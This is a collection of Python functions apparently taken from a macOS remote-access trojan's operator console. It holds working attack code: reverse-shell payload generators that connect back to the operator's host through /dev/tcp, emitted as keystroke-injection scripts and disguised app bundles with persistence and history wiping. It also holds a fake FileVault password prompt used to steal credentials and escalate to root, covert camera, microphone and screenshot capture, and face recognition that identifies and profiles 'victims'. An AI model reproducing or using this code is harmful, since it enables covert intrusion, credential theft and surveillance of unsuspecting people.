def interact(self):
h.info_general("Listening on port {0}...".format(self.server.port))
h.info_general("Type \"help\" for commands")
while 1:
try:
input_data = raw_input(self.handle)
if not input_data:
continue
cmd = input_data.split()[0]
args = input_data[len(cmd):].strip()
if cmd == "interact":
self.interact_with_session(args)
elif cmd == "close":
self.close_session(args)
elif cmd == "sessions":
self.list_sessions()
elif cmd == "help":
self.show_commands()
elif cmd == "exit":
self.stop_server()
return
else:
h.info_error("Invalid Command: " + cmd)
except KeyboardInterrupt:
sys.stdout.write("\n")
self.stop_server()
return
def run(self,session,cmd_data):
if not cmd_data['args'] or (cmd_data['args'] != "front" and cmd_data['args'] != "back"):
print self.usage
return
if cmd_data['args'] == "back":
cmd_data['args'] = False
else:
cmd_data['args'] = True
h.info_general("Taking picture...")
try:
response = json.loads(session.send_command(cmd_data))
if 'success' in response:
size = int(response["size"])
if cmd_data['args'] == False:
file_name = "back_{0}.jpg".format(int(time.time()))
else:
file_name = "front_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads',file_name),'w')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
else:
if 'error' in response:
h.info_error(response['error'])
else:
h.info_error("Unexpected error")
except Exception as e:
print e
def upload_file(self, file_path, remote_dir, remote_file_name):
term = binascii.hexlify(os.urandom(16))
if os.path.exists(file_path):
f = open(file_path, "rb")
data = f.read()
size = len(data)
name = os.path.split(file_path)[-1]
cmd_data = json.dumps({
"cmd":
"upload",
"args":
json.dumps({
"size": size,
"path": remote_dir,
"filename": remote_file_name
}),
"term":
term
})
self.sock_send(cmd_data)
for i in range((size / 1024) + 1):
deltax = i * 1024
chunk = data[deltax:deltax + 1024]
self.sock_send(chunk)
self.sock_send(term)
else:
h.info_error("Local file: " + file_path + " does not exist")
def show_session(self, session):
try:
print str(session.id) + " | " +\
session.username + "@" + session.hostname + " | " + \
str(session.conn.getpeername()[0])
except Exception as e:
h.info_error(str(e))
def interact_with_session(self, session_number):
if not session_number:
print "Usage: interact (session number)"
return
try:
self.sessions_id[int(session_number)].interact()
except:
h.info_error("Invalid Session")
def run(self,session,cmd_data):
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error(result['error'])
elif 'current_directory' in result:
session.current_directory = result['current_directory'].encode('utf-8')
else:
h.info_error('Unable to get current directory!')
def interact_with_session(self,session_number):
if not session_number:
print "Usage: interact <session>"
return
try:
self.sessions_id[int(session_number)].interact()
except:
h.info_error("Session "+session_number+" is not found!")
def interact_with_session(self,session_number):
if not session_number:
print "Usage: Interact + [Session Number]"
return
try:
self.sessions_id[int(session_number)].interact()
except:
h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
def run(self,server):
while 1:
persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $(bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
break
elif persistence == "n" or not persistence:
shell_command = "bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
break
else:
h.info_error("Unrecognized option!")
shell_command += "history -wc;killall Terminal"
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/teensy_macos") == False:
os.mkdir("payloads/teensy_macos")
payload_save_path = "payloads/teensy_macos/teensy_macos.ino"
payload = """\
#include "Keyboard.h"
const int LED = 13;
void setup() {
pinMode(LED, OUTPUT);
Serial.begin(9600);
delay(1000); //delay to establish connection
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(200);
Keyboard.print("terminal");
delay(1000);
keyEnter();
delay(1000);
Keyboard.print(\""""+shell_command+"""\");
keyEnter();
}
void keyEnter() {
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
//release
Keyboard.set_key1(0);
Keyboard.send_now();
}
void loop() {
digitalWrite(LED, HIGH);
delay(100);
digitalWrite(LED, LOW);
delay(100);
}"""
f = open(payload_save_path,"w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + payload_save_path)
def interact_with_session(self, session_number, cmd_data):
if not session_number:
print "Usage: interact (session number)"
return None
try:
return self.sessions_id[int(session_number)].interact(cmd_data)
except:
h.info_error("Invalid Session")
return None
def close_session(self, session_number):
if not session_number:
print "Usage: close <session_number>"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Closing session ' + session_number + '...')
except:
h.info_error("Invalid session number!")
def close_session(self,session_number):
if not session_number:
print "Usage: Terminate + [Session Number]"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Terminating Session ' + session_number)
except Exception as e:
print e
h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
def close_session(self, session_number):
if not session_number:
print "Usage: close (session number)"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Closing session ' + session_number)
except Exception as e:
print e
h.info_error("Invalid Session")
def run(self, session, cmd_data):
if cmd_data['args'] == "install":
h.info_general("Installing...")
elif cmd_data['args'] == "uninstall":
h.info_general("Uninstalling...")
else:
print self.usage
return
result = session.send_command(cmd_data)
if result:
h.info_error(result)
def run(self, session, cmd_data):
while 1:
uid = session.send_command({"cmd": "echo", "args": "$UID"})
if uid[:-1] == "0":
whoami = "# "
else:
whoami = "$ "
shell = raw_input(h.ENDC + session.hostname + ":" +
session.current_directory + " " +
session.username + whoami)
if not shell or shell.replace(" ", "") == "":
continue
shelld = shell.split()[0]
shelld_data = {"cmd": shelld, "args": shell[len(shelld) + 1:]}
if shelld == "cd":
result = json.loads(session.send_command(shelld_data))
if 'error' in result:
h.info_error(result['error'])
elif 'current_directory' in result:
session.current_directory = result[
'current_directory'].encode('utf-8')
else:
h.info_error('Unable to get current directory!')
if shelld == "ls":
if not shelld_data['args']:
shelld_data['args'] = '.'
data = session.send_command(shelld_data)
try:
contents = json.loads(data)
except:
print data
return
keys = contents.keys()
keys.sort()
for k in keys:
if contents[k] == 4 or contents[k] == 10:
print h.COLOR_INFO + k + h.ENDC
else:
print k
if shelld == "exit":
return
else:
try:
result = session.send_command(shelld_data)
if result:
if shelld == "ls" or shelld == "cd":
pass
else:
print result.rstrip()
except KeyboardInterrupt:
session.send_command({"cmd": "killtask"})
def run(self, session, cmd_data):
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error(result['error'])
return
elif 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
file_name = "screenshot_{0}.jpg".format(int(time.time()))
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self,session,cmd_data):
payload = """
tell application "Finder"
activate
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if mypass > "" then exit repeat
end try
end repeat
try
do shell script "echo " & quoted form of mypass
end try
end tell
"""
cmd_data.update({"cmd":"applescript","args":payload})
password = session.send_command(cmd_data).strip()
#display response
print h.COLOR_INFO+"[*] "+h.WHITE+"Response: "+h.GREEN+password+h.WHITE
#prompt for root
tryroot = raw_input("Would you like to try for root? (Y/n) ")
tryroot = tryroot if tryroot else "y"
if tryroot.lower() != "y":
return ""
#TODO: I am so lazy, probably should use the su command
password = password.replace("\\","\\\\").replace("'","\\'")
cmd_data.update({"cmd":"eggsu","args":password})
result = session.send_command(cmd_data)
if "root" in result:
h.info_general("Root Granted!")
time.sleep(0.2)
h.info_general("Escalating Privileges...")
if session.server.is_multi == False:
session.server.update_session(session)
else:
session.needs_refresh = True
else:
h.info_error("Failed getting root!")
return ""
def identify_victim(self, session_id):
if session_id < 1:
h.info_error("Invalid Session")
return False
try:
idx = session_id - 1
victim = self.victims['victims'][idx]
# if already identified, return True
if victim['identified']:
return True
file_name = self.sessions_id[session_id].init_interact()
response = faceRec(file_name)
response = json.loads(response)
h.info_general("Face Rec Result:")
print(response)
if response['status'] == "Ok":
print(response['faceId'])
faceid = response['faceId']
if faceid in self.faceid_mapping['FaceToPerson']:
person_name = self.faceid_mapping['FaceToPerson'][faceid]
for person in self.person_db['Person']:
if person['name'] == person_name:
identified_victim = {}
identified_victim['session_id'] = session_id
identified_victim['profile'] = person
self.identified_victims[
'identified_victims'].append(identified_victim)
self.identified_victims[
'total_identified_victims'] += 1
break
victim['identified'] = True
return True
else:
print("Person not in Database")
return False
else:
print("No Face Rec result")
return False
except:
h.info_error("Person cannot be recognized")
return False
def run(self, server):
while 1:
persistence = raw_input(
h.info_question_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $(bash &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
shell_clean = "history -wc;killall Terminal"
break
elif persistence == "n" or not persistence:
shell_command = "bash &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
shell_clean = "history -wc;killall Terminal"
break
else:
h.info_error("Unrecognized option!")
shell_command += "history -wc;killall Terminal"
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/rubber_duck") == False:
os.mkdir("payloads/rubber_duck")
payload_save_path = "payloads/rubber_duck/payload.txt"
payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """ + shell_command + """
DELAY 500
ENTER
DELAY 500
"""
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + payload_save_path)
def run(self, server):
while 1:
name = raw_input(h.info_general_raw("Application Name> "))
icon = raw_input(h.info_general_raw("Application Icon> "))
persistence = raw_input(
h.info_general_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $(bash &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
elif persistence == "n" or not persistence:
shell_command = "bash &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
else:
h.info_error("invalid option: " + persistence)
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/macos_application") == False:
os.mkdir("payloads/macos_application")
os.system("""
cp -r resources/payload.app payloads/macos_application
mv payloads/macos_application/payload.app payloads/macos_application/""" +
name + """.app
mv """ + icon + """ payloads/macos_application/""" + name +
""".app/Contents/Resources/payload.icns
""")
payload_save_path = "payloads/macos_application/" + name + ".app/Contents/MacOS/payload.sh"
sas = "payloads/macos_application/" + name + ".app"
payload = """\
#! /usr/bin/env bash
""" + shell_command + """
"""
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + sas)
os.system("chmod +x payloads/macos_application/" + name +
".app/Contents/MacOS/payload.sh")
def run(self, session, cmd_data):
# #print(output )
if cmd_data["args"] == "stop":
# expect json
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Error: " + result['error'])
elif 'status' in result and result['status'] == 1:
# download file
data = session.download_file("/tmp/.avatmp")
file_name = "mic{0}.caf".format(str(int(time.time())))
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
elif cmd_data["args"] == "record":
h.info_general(session.send_command(cmd_data))
else:
print("Usage: mic record/stop")
def init_interact_with_session(self):
if self.new_session_id < 1:
print "Usage: interact (session number)"
return
try:
file_name = self.sessions_id[self.new_session_id].init_interact()
response = faceRec(file_name)
response = json.loads(response)
if response['status'] == "Ok":
print(response['faceId'])
faceid = response['faceId']
else:
print("no data match")
faceid = ""
# faceid = "faceid1"
if faceid in self.faceid_mapping['FaceToPerson']:
person_name = self.faceid_mapping['FaceToPerson'][faceid]
for person in self.person_db['Person']:
if person['name'] == person_name:
self.victims[self.new_session_id] = person
self.victims_modify = True
except:
h.info_error("Invalid Session")
def save_images(self, session_id, filename):
if session_id < 1:
h.info_error("Invalid Session")
return
try:
idx = session_id - 1
victim = self.victims['victims'][idx]
# Only save the image for identified victim
if not victim['identified']:
h.info_general("Session has not been identified")
return
victim_name = None
identified_victims = self.identified_victims['identified_victims']
for victim in identified_victims:
if victim['session_id'] == session_id:
victim_name = victim['profile']['name']
break
# Had found the victim, save the image in personal db
if victim_name:
try:
image_path = "./DB/pictures/" + filename
personal_db_image_path = "./DB/" + victim_name + "/Images/"
if not os.path.exists(personal_db_image_path):
os.makedirs(personal_db_image_path)
image = Image.open(image_path)
image.save(personal_db_image_path + filename,
optimize=True,
quality=10)
h.info_general("Saved to" + personal_db_image_path +
filename)
return
except:
h.info_error("Image save path error")
return
else:
h.info_general("Haven't found the target victim")
return
except:
h.info_error("Error in Saving the image")
return
def get_all_images(self, victim_name):
if not victim_name:
h.info_error("Invalid victim name")
return None
try:
try:
victim_db_path = "./DB/"
victims_folders = os.listdir(victim_db_path)
if victim_name not in victims_folders:
h.info_general("Unidentified victim")
return None
except:
return None
# Had found the victim folder, get all image files
if victim_name:
try:
personal_db_image_path = "DB/" + victim_name + "/Images/"
if not os.path.exists(personal_db_image_path):
os.makedirs(personal_db_image_path)
images = [
f for f in os.listdir(personal_db_image_path)
if f.endswith('.jpg')
]
total_images = len(images)
results = {}
results['images'] = images
results['total_images'] = total_images
results['image_path'] = personal_db_image_path
return results
except:
h.info_error("Fetching Images Error")
return None
else:
h.info_general("Invalid victim name")
return None
except:
h.info_error("Error in get the images")
return None
